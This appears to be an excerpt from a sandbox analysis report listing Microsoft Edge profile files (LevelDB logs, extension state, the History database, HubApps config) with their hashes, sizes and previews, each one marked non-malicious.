                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324622949646616
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R1:C1gAg1zfvd
                                                                                                                                                                                                                                                                                                      MD5:1901CDD105E2E6E70C18803F89DF296E
                                                                                                                                                                                                                                                                                                      SHA1:D9A49A4CEE6D95F183FD9078D6663AFAA85E4C07
                                                                                                                                                                                                                                                                                                      SHA-256:442BAE2878575B7EF7B9CC0EFD4613FFFE92B15ADABA6CECB0A7176B2AA78BB8
                                                                                                                                                                                                                                                                                                      SHA-512:8745246F019D783B9A23FA409A1C4B774BDBD7102647CF1C765F8D1CE0EA90BDDAE2FC527F7BC59D4070F22BD1047AE61797F12FFF85E01F82824E00BBC697AB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.116294628988241
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:76UIIq2PcNwi23oH+Tcwt8aPrqIFUt8O6UIZZmw+OU0kwOcNwi23oH+Tcwt8amLJ:7/pvLZYebL3FUt8O/0/+O754ZYebQJ
                                                                                                                                                                                                                                                                                                      MD5:712201B16D1055262CF00C2D3F7570D6
                                                                                                                                                                                                                                                                                                      SHA1:1C746B47BCA652B873BE6155434A32023C5C7BED
                                                                                                                                                                                                                                                                                                      SHA-256:46F9315AC4BA430C7107DEFE070332D7E8677CF567AEC431B348E04202DA2795
                                                                                                                                                                                                                                                                                                      SHA-512:09C5F80B94999ED67839211805E30681026212DF6CA799798F37C2F1CDFCE13BA916A566EDD8B7FF17E8ECB0B2ECEE3AD32FCD1F9D9FE611518263D2804E3163
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.541 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:41:31.541 13f4 Recovering log #3.2024/12/10-12:41:31.542 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.116294628988241
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:76UIIq2PcNwi23oH+Tcwt8aPrqIFUt8O6UIZZmw+OU0kwOcNwi23oH+Tcwt8amLJ:7/pvLZYebL3FUt8O/0/+O754ZYebQJ
                                                                                                                                                                                                                                                                                                      MD5:712201B16D1055262CF00C2D3F7570D6
                                                                                                                                                                                                                                                                                                      SHA1:1C746B47BCA652B873BE6155434A32023C5C7BED
                                                                                                                                                                                                                                                                                                      SHA-256:46F9315AC4BA430C7107DEFE070332D7E8677CF567AEC431B348E04202DA2795
                                                                                                                                                                                                                                                                                                      SHA-512:09C5F80B94999ED67839211805E30681026212DF6CA799798F37C2F1CDFCE13BA916A566EDD8B7FF17E8ECB0B2ECEE3AD32FCD1F9D9FE611518263D2804E3163
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.541 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:41:31.541 13f4 Recovering log #3.2024/12/10-12:41:31.542 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.138029525271188
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7nq2PcNwi23oH+Tcwt865IFUt8OfZZmw+OwFkwOcNwi23oH+Tcwt86+ULJ:7nvLZYeb/WFUt8OR/+Oc54ZYeb/+SJ
                                                                                                                                                                                                                                                                                                      MD5:B9EE4BF90AC8561511276F585ECC863C
                                                                                                                                                                                                                                                                                                      SHA1:4FFBC20FF5680FCC3DB1F58CED2FE7CA2B873CE1
                                                                                                                                                                                                                                                                                                      SHA-256:477583C10BFE351B8320B9C24418D0D6A7E5D2E5F1729B59795676DD3B744094
                                                                                                                                                                                                                                                                                                      SHA-512:F250EFF0768553E60A5BDC729F332BB675B48C6FA6F20C20C01B368FFFD1FBECA58FCCFF8F83DE38C248580E5BF43359FAD0FDB36C457C59D9D8EC92F26EBA84
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.550 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:41:31.551 13f4 Recovering log #3.2024/12/10-12:41:31.552 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.138029525271188
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7nq2PcNwi23oH+Tcwt865IFUt8OfZZmw+OwFkwOcNwi23oH+Tcwt86+ULJ:7nvLZYeb/WFUt8OR/+Oc54ZYeb/+SJ
                                                                                                                                                                                                                                                                                                      MD5:B9EE4BF90AC8561511276F585ECC863C
                                                                                                                                                                                                                                                                                                      SHA1:4FFBC20FF5680FCC3DB1F58CED2FE7CA2B873CE1
                                                                                                                                                                                                                                                                                                      SHA-256:477583C10BFE351B8320B9C24418D0D6A7E5D2E5F1729B59795676DD3B744094
                                                                                                                                                                                                                                                                                                      SHA-512:F250EFF0768553E60A5BDC729F332BB675B48C6FA6F20C20C01B368FFFD1FBECA58FCCFF8F83DE38C248580E5BF43359FAD0FDB36C457C59D9D8EC92F26EBA84
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.550 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:41:31.551 13f4 Recovering log #3.2024/12/10-12:41:31.552 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.134680548706364
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:73+q2PcNwi23oH+Tcwt8NIFUt8OmZmw+OiVkwOcNwi23oH+Tcwt8+eLJ:7OvLZYebpFUt8Om/+Oa54ZYebqJ
                                                                                                                                                                                                                                                                                                      MD5:07D72566967DD06A08FAC2F6CF47CD19
                                                                                                                                                                                                                                                                                                      SHA1:BF7D25E62486667F83FA6377EC6B49908A00163F
                                                                                                                                                                                                                                                                                                      SHA-256:1785945BC45CDB3D75A986B366064FC0D70F9F28A77C31208349A40148E6D973
                                                                                                                                                                                                                                                                                                      SHA-512:25198834DF06FBE993493C6179E7FCA78FA130C513D3D03B1235D82655FF9A99D38435216EEBFCD66CBCD0C69849E749AFDBD28F6FF87AE879E7D4F3DA9EFD8D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.401 1bb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:32.402 1bb8 Recovering log #3.2024/12/10-12:41:32.402 1bb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.134680548706364
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:73+q2PcNwi23oH+Tcwt8NIFUt8OmZmw+OiVkwOcNwi23oH+Tcwt8+eLJ:7OvLZYebpFUt8Om/+Oa54ZYebqJ
                                                                                                                                                                                                                                                                                                      MD5:07D72566967DD06A08FAC2F6CF47CD19
                                                                                                                                                                                                                                                                                                      SHA1:BF7D25E62486667F83FA6377EC6B49908A00163F
                                                                                                                                                                                                                                                                                                      SHA-256:1785945BC45CDB3D75A986B366064FC0D70F9F28A77C31208349A40148E6D973
                                                                                                                                                                                                                                                                                                      SHA-512:25198834DF06FBE993493C6179E7FCA78FA130C513D3D03B1235D82655FF9A99D38435216EEBFCD66CBCD0C69849E749AFDBD28F6FF87AE879E7D4F3DA9EFD8D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.401 1bb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:32.402 1bb8 Recovering log #3.2024/12/10-12:41:32.402 1bb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6221657682308758
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:+T3x7TsmbEWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kEzC6:+TB3ZhH+bDo3iN0Z2TVJkXBBE3yb2
                                                                                                                                                                                                                                                                                                      MD5:EC1AD99C2053C57B2E9F023EB5C065AA
                                                                                                                                                                                                                                                                                                      SHA1:7332BCB18F65E055B446FCA21E8EE2E2071908B8
                                                                                                                                                                                                                                                                                                      SHA-256:90490B44A60D93AC7B2C220CAF6D022503D4112F39053D9F9F81A279B87E4C12
                                                                                                                                                                                                                                                                                                      SHA-512:42FCB2CC5ECAAC509D31BF3A5370D4E7EF3102435DA1C2E070B2CB181678B32D82DBDE8E9A9259217C9917DFC4CD3EF017650F7EB7A19DCE73C2E13DBC8DB4E4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.21801448144911773
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:e2L/ntFlljq7A/mhWJFuQ3yy7IOWUP4/dweytllrE9SFcTp4AGbNCV9RUIS:bk75fOd4/d0Xi99pEYw
                                                                                                                                                                                                                                                                                                      MD5:8C55824C8982BE738972F4AB4265F6F7
                                                                                                                                                                                                                                                                                                      SHA1:91838EF9AE52CB19990A736E3DE511A3185AABD5
                                                                                                                                                                                                                                                                                                      SHA-256:88539CE3929A3B2086CD88C06B10330B389D6AB103F9797B0DDF939DA15A6DFD
                                                                                                                                                                                                                                                                                                      SHA-512:5E2D248EFE5AB11E2966C15FE700944C8CEBB7BDDBC077C751A268024E5AD1965A15D39088154C7C4AE3B59D74C0726D873C569D6261E496D9C135C6914F7797
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:............s..W...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6480765067883114
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0tcAjl+QkQerDP/Kbt+773pL9hCgam6ItRKToaAu:adTKl+e2DP/P7Pv9RKcC
                                                                                                                                                                                                                                                                                                      MD5:206D5391A36486D9E39C96DC9C6995AB
                                                                                                                                                                                                                                                                                                      SHA1:0D3ECF912D29427827B87521F9010AF7E2D84EF0
                                                                                                                                                                                                                                                                                                      SHA-256:CE70C08E22AFBECDF3D344FCC276BEDA4A4CA9B8C1EAF8DCA15CB663943F7B6F
                                                                                                                                                                                                                                                                                                      SHA-512:26AE30E175400A8921499A5B76D4A402B8CBC014BE48BE68D79230380C579657C3FBFC2A550ECF391EAC64672FF83FEB577FA30C5F33DF1C256B5A271F71EDF1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.277454389993055
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:70IvLZYeb8rcHEZrELFUt8OF/+OX54ZYeb8rcHEZrEZSJ:73lYeb8nZrExg8OpJoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                      MD5:35E8B1AC03A10E7E5BFEDC2D097A0BD8
                                                                                                                                                                                                                                                                                                      SHA1:9275829C95C22767565BB582BB34676B76323591
                                                                                                                                                                                                                                                                                                      SHA-256:657E3BAA69516CBB0201DC7563B017D4C4641B2197D0514EEA6E80D1C3909582
